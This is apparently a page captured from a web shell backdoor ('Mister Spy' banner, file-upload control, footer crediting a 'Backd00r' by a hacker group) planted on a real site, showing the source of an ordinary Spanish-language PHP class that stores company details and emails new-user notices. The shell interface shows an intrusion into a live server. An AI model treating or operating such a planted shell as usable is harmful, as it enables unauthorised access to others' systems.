Mister Spy Say ="Hello Kids ... :D" ___ ____ _ _____ | \/ (_) | | / ___| | . . |_ ___| |_ ___ _ __ \ `--. _ __ _ _ | |\/| | / __| __/ _ \ '__| `--. \ '_ \| | | | | | | | \__ \ || __/ | /\__/ / |_) | |_| | \_| |_/_|___/\__\___|_| \____/| .__/ \__, | | | __/ | |_| |___/ Bot Mister Spy V3
Mister Spy

Mister Spy

Current Path : /home/caballoscriollos/public_html/web/library/
Upload File :
Current File : /home/caballoscriollos/public_html/web/library/class.datoempresa.php

<?php

require_once('class.db.php');
require_once('class.dbaccess.php');
require_once('class.configuraciones.php');

class DatoEmpresa
{
	const PathImageLogo = '../_recursos/datosempresa/';
	
	public $IdDatoEmpresa;
	public $RazonSocial;
	public $CodigoAreaTelefono;
	public $Telefono;
	public $CodigoAreaTelefono2;
	public $Telefono2;
	public $CodigoAreaFax;
	public $Fax;
	public $Email;
	public $EmailContacto;
	public $EmailRegistro;
	public $EmailCheckout;
	public $DireccionCalle;
	public $DireccionNumero;
	public $DireccionPiso;
	public $DireccionDepartamento;
	public $IdPais;
	public $IdProvincia;
	public $Localidad;
	public $CodigoPostal;
	public $PaginaWeb;
	public $Logo;
	public $PaisNombre;
	public $ProvinciaNombre;
	public $SeoRubroEmpresa;
	public $SeoNombreEmpresa;


	public function ParseFromArray(array $arr)
	{
		$this->IdDatoEmpresa			= $arr['IdDatoEmpresa'];
		$this->RazonSocial				= $arr['RazonSocial'];
		$this->CodigoAreaTelefono		= $arr['CodigoAreaTelefono'];
		$this->Telefono					= $arr['Telefono'];
		$this->CodigoAreaTelefono2		= $arr['CodigoAreaTelefono2'];
		$this->Telefono2				= $arr['Telefono2'];
		$this->CodigoAreaFax			= $arr['CodigoAreaFax'];
		$this->Fax						= $arr['Fax'];
		$this->Email					= $arr['Email'];
		$this->EmailContacto 			= $arr['EmailContacto'];
		$this->EmailRegistro 			= $arr['EmailRegistro'];
		$this->EmailCheckout 			= $arr['EmailCheckout'];
		$this->DireccionCalle			= $arr['DireccionCalle'];
		$this->DireccionNumero			= $arr['DireccionNumero'];
		$this->DireccionPiso			= $arr['DireccionPiso'];
		$this->DireccionDepartamento	= $arr['DireccionDepartamento'];
		$this->IdPais					= $arr['IdPais'];
		$this->IdProvincia				= $arr['IdProvincia'];
		$this->Localidad				= $arr['Localidad'];
		$this->CodigoPostal				= $arr['CodigoPostal'];
		$this->PaginaWeb				= $arr['PaginaWeb'];
		$this->Logo						= $arr['Logo'];
		$this->PaisNombre				= $arr['PaisNombre'];
		$this->ProvinciaNombre			= $arr['ProvinciaNombre'];
		$this->SeoRubroEmpresa			= $arr['SeoRubroEmpresa'];
		$this->SeoNombreEmpresa			= $arr['SeoNombreEmpresa'];
	}
	
	
	public function SendMailNewUser(Usuario $oUsuario)
	{
		/* obtenemos informacion de configuracion del sitio */
		$oConfiguraciones = new Configuraciones();
		$oConfiguracion = $oConfiguraciones->GetRow();

		$Headers = "";
		$Headers.= "MIME-Version: 1.0" . "\r\n";
		$Headers.= "Content-type: text/html; charset=iso-8859-1" . "\r\n"; 
		$Headers.= "X-Mailer: php" . "\r\n";
		$Headers.= "From: " . $this->RazonSocial . "\r\n";
		$Headers.= " <" . $oConfiguracion->EmailNoReply . ">" . "\r\n";
	
		$Content = '';
		$Content.= 'Se ha registrado un nuevo cliente en ' . $this->RazonSocial . '.<br><br>';
		$Content.= 'Nombre: ' . $oUsuario->GetUsuario() . '<br>';
		$Content.= 'Email: ' . $oUsuario->Email . '<br>';
		$Content.= 'Perfil: ' . ListaTipos::GetById($oUsuario->IdTipoLista) . '<br><br>';

		/* dependiendo del tipo de registro... */
		if ($oUsuario->IdTipoLista == ListaTipos::Minorista)
		{
			$Content.= 'Ingrese al administrador para verificar todos los datos.<br><br>';
		}
		elseif ($oUsuario->IdTipoLista == ListaTipos::Mayorista)
		{
			$Content.= 'Debe activarlo desde el administrador para que pueda comenzar a operar.<br><br>';
		}
		
		$Content.= "Muchas gracias. <br><br>";
		$Content.= 'El equipo de ' . $this->RazonSocial . '.<br>';
		$Content.= 'Tel: (' . $this->CodigoAreaTelefono . ') - ' . $this->Telefono . '<br>';
		$Content.= '<b>' . $this->Email . '</b>';
	
		$Asunto = "";
		$Asunto = $this->RazonSocial . ' - Nuevo Usuario ' . ListaTipos::GetById($oUsuario->IdTipoLista);
		
		mail($this->EmailRegistro, $Asunto , $Content, $Headers);
	}
}

?>

Mr. DellatioNx196 GaLers xh3LL Backd00r 1.0, Coded By Mr. DellatioNx196 - Bogor BlackHat